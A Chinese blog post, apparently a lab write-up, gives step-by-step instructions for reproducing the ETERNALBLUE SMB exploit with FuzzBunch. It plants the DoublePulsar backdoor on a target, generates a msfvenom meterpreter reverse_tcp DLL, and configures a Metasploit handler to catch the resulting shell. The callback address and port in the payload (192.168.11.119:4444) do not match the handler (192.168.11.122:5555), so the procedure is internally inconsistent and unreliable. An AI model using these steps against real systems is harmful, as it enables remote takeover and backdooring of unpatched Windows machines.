方程式0day ETERNALBLUE 复现过程
2018-02-27 本文已影响0人
__周__
环境:
- python-2.6.6.msi
https://www.python.org/download/releases/2.6.6/ - pywin32-221.win32-py2.6.exe
https://sourceforge.net/projects/pywin32/files/pywin32/Build%20221/
去github上把需要脚本下载下来,解压到桌面上,然后设置python的环境变量,再运行fb.py,再次之前要在当前目录下配置一个名为listeningposts的目录,否则会报错
-
成功执行fb.py的界面为
图片.png
-首先会让你输入目标机器的ip地址;本地ip
图片.png
- 询问是否重定向,选否
图片.png
-
选择基本日志目录,输入no(由于我这里已经复现过一次,所以这里显示有test)
图片.png
-这里我直接选择0进入test,如果没有test项目,可以选择另一个创建一个新的项目
图片.png
- 然后下一步就默认回车
图片.png
- 使用永恒之蓝的模块
图片.png
-
下面的默认回车
1.png
2.png
-
选择目标机器的系统,选择1
图片.png
- 选择fuzzbunch
图片.png
- 然后下面几个默认回车
图片.png
- 在目标机器对应的SMB端口植入一个名为DoublePulsar的后门程序
图片.png
- 然后默认回车。。。
图片.png
- 下面的这个选择 SMB,再下面的选择操作系统版本这里选择64位
图片.png
-
下一步选择 运行全部 2
图片.png
接下来需要从kali中生成一个.dll的payload,供其使用,将生成出来的dll放到攻击机win7下
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.11.119 LPORT=4444 -f dll > s.dll
图片.png
-
然后把生成的dll文件导入到工具中
图片.png
-
然后又是默认敲回车
图片.png
图片.png
- 接下来去kali里面配置msf
use exploit/multi/handler
set LHOST 192.168.11.122
set LPORT 5555
set PAYLOAD windows/x64/meterpreter/reverse_tcp
exploit
之后就可以坐等shell上门啦
